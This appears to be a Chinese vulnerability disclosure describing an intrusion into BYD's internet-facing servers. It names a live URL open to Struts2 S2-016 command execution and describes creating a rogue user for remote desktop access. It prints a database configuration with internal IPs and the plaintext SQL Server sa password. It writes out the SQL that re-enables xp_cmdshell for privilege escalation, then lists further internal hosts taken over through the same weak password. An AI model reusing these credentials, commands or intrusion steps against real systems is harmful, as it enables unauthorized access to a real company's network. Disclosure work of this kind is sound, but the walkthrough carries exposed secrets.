之前提过比亚迪外网可能还有很多服务器存在命令执行 找了一下 果然有 而且还可以作为边界服务器漫游内网

https://csm.byd.com.cn/homeAction.action

S2-016
 

byd1.png

创建了个test用户,连接远程桌面进去看了下,有内网IP:
 

byd-new1.png



在此台计算上:

发现数据库配置信息:

<bean id="dataSource" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close"> <!-- SQL Server 2005 for microsoft --> <!-- <property name="driverClassName" value="com.microsoft.sqlserver.jdbc.SQLServerDriver"/> <property name="url" value="jdbc:sqlserver://10.12.3.143(137):1433;databaseName=cms"/> --> <!-- SQL Server 2005 for jtds --> <property name="driverClassName" value="net.sourceforge.jtds.jdbc.Driver"/> <!--正式--> <property name="url" value="jdbc:jtds:sqlserver://10.12.3.137:1433/cms"/> <!--测试--> <!--<property name="url" value="jdbc:jtds:sqlserver://10.12.3.143:1433/cms"/>--> <property name="username" value="sa"/> <property name="password" value="bydbyd"/>


sa权限,提权,遇到阻碍,禁止了cmshell 安全选项

直接sa链接进去 执行SQL 恢复了(所以这种加固是不彻底的,不能随意的将sa权限授予普通web用户):

EXEC sp_configure 'show advanced options', 1 --

RECONFIGURE WITH OVERRIDE --

EXEC sp_configure 'xp_cmdshell', 1 --

RECONFIGURE WITH OVERRIDE --

EXEC sp_configure 'show advanced options', 0 --

接着提权,创建test用户 连接:

这次应该是到了核心的内网了,看了下附近的服务器情况:
 

byd-inter.png



用同样的弱口令对10.12.3.*网段进行扫描:

又有两台内网主机可以提权:

10.12.3.126 --- sa/bydbyd



10.12.3.143 ---sa/bydbyd



没再深入了 ~


 

解决方案:

边界问题的网络配置很重要 运维中的权限也需要加强~